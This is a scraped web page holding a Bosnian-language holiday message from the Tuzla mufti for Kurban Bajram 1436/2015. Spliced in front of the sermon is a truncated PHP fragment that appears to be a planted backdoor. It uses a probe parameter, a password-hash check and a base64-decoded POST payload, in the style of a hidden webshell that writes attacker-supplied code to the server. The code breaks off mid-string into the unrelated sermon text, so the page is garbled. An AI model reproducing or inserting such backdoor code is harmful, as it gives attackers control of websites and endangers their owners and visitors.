function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Poruka muftije tuzlanskog na Kurbanski bajram 1436/2015. - Medžlis Islamske zajednice Bijeljina

Poruka muftije tuzlanskog na Kurbanski bajram 1436/2015.

Poruka muftije tuzlanskog na Kurbanski bajram 1436/2015.

Bismillahirrahmanirrahim! Hvala neka je Allahu, Čije su djelo nebesa i Zemlja. U njih je utkao Svoju Milost i sve obuhvatio Svojim znanjem. Sve postojeće postoji zahvaljujući Njemu. Jedna od Njegovih odredbi je i ta što nam je podario radost u našoj vjeri, čiju puninu najbolje doživimo u trenucima odabranih mubarek-dana. Tome nas je podučio Poslanik plemeniti, kojeg je Uzvišeni između Svojih najboljih stvorenja izabrao i najplemenitijm ponašanjem, najistinitijom riječju i najboljim djelom odlikovao. Objavio mu je Svoju knjigu i kao milost ga svim svjetovima povjerio.

Braćo i sestre.

Bajramski mubarek-dani su naslonjeni na najvažnije dužnosti muslimana prema Stvoritelju svjetova: Ramazanski bajram je najizravnije povezan s postom i namazom, a Kurbanski bajram s hadždžom i kurbanom.

Ovi dani također simboliziraju i džematsku snagu vjernika i dobrotu prema svim ljudima. U blagoslovljenim danima ovog hadžskog mjeseca, zul-hidždžeta, naš se takvaluk, naša svijest, produbljava, a odlučnost da odgovorno i predano svoje poslove obavljamo uvećava. U današnjem njegovom devetom danu svi ovogodišnji hodočasnici se okupljaju na Arefatu, posebnom mjestu kod Mekke s kojeg je od zajedničkih nam roditelja Adema i Have i potekla rijeka naše zajedničke ljudske zemaljske sudbine. S tog časnog mjesta upućuju se dove iz oplemenjenih duša miliona vjernika Svemogućem Bogu, bez Čije pomoći i upute čovječanstvo danas ne može pronaći pravi put, kao što to nije bilo u stanju učiniti ni ranije kada je zapadalo u velike kušnje i nevolje. I mi smo im se pridružili našim iskrenim ibadetima. Njihova skrušena dova je, ako Bog da, i naša dova, i može nam biti zajednička nada, jer je Muhammed, alejhisselam, dao obećanje da će u tom danu na tom mjestu ona biti uslišana.

Sutra nastupa prvi dan Kurban-bajrama. U njemu će se snažno iskazati naša duhovna bliskost, naše bratstvo i zajedništvo. Požurit ćemo da se ibadetom kurbana što više približimo našem Stvoritelju, koji će nama i našim porodicama za našu predanost dati Svoje čuvanje i zaštitu.

Uistinu, privrženost ibadetima jača našu vjeru koja nas obasjava i pomaže da sebi i drugima ukazujemo na put dobra i izlaz iz tmina neizvjesnosti i zablude na svjetlo jasne upute. U Kur'anu Časnom se kaže: On vas blagosilja, i Njegovi meleki, da bi vas iz tmina na Svjetlo izveo. Allah je samilostan vjernicima. (El-Ahzab, 43.)

Draga braćo i poštovane sestre.

Neka vam Allah Uzvišeni podari dug život, dobro zdravlje i zadovoljstvo u vašoj vjeri, moralu i dobrim djelima.

Svim muslimanima, povodom Kurban-bajrama, upućujem iskrene čestitke, s pozivom da našu bajramsku radost podijelimo sa svim ljudima.

Bajram šerif mubarek olsun.